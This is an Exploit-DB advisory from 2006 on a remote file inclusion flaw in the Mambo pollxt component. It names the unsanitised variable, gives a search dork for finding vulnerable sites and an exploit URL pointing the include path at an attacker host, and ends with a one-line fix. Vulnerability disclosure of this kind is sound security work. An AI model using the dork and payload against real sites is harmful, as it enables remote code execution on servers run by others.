Lucene search

K
exploitdbVituxEDB-ID:2029
HistoryJul 17, 2006 - 12:00 a.m.

Mambo Component pollxt 1.22.07 - Remote File Inclusion

2006-07-1700:00:00
vitux
www.exploit-db.com
40

AI Score

7.4

Confidence

Low

Application : pollxt mambo Component
 
URL : http://www.mamboxt.com
 
Variable $mosConfig_absolute_path not sanitized: xpl works with register_globals=on
in components/com_pollxt/conf.pollxt.php on line 1-2
 
require_once($mosConfig_absolute_path."/administrator/components/com_pollxt/pollxt.class.php");

Exploit:
~~~~~~~~

dork: inurl:"com_pollxt"
 
http://www.vuln.com/components/com_pollxt/conf.pollxt.php?mosConfig_absol
ute_path=http://evilhost

Fix
~~~~

Add before code:
defined('_VALID_MOS') or die('Direct access to this location is not allowed.');

vitux

# milw0rm.com [2006-07-17]

AI Score

7.4

Confidence

Low

Related for EDB-ID:2029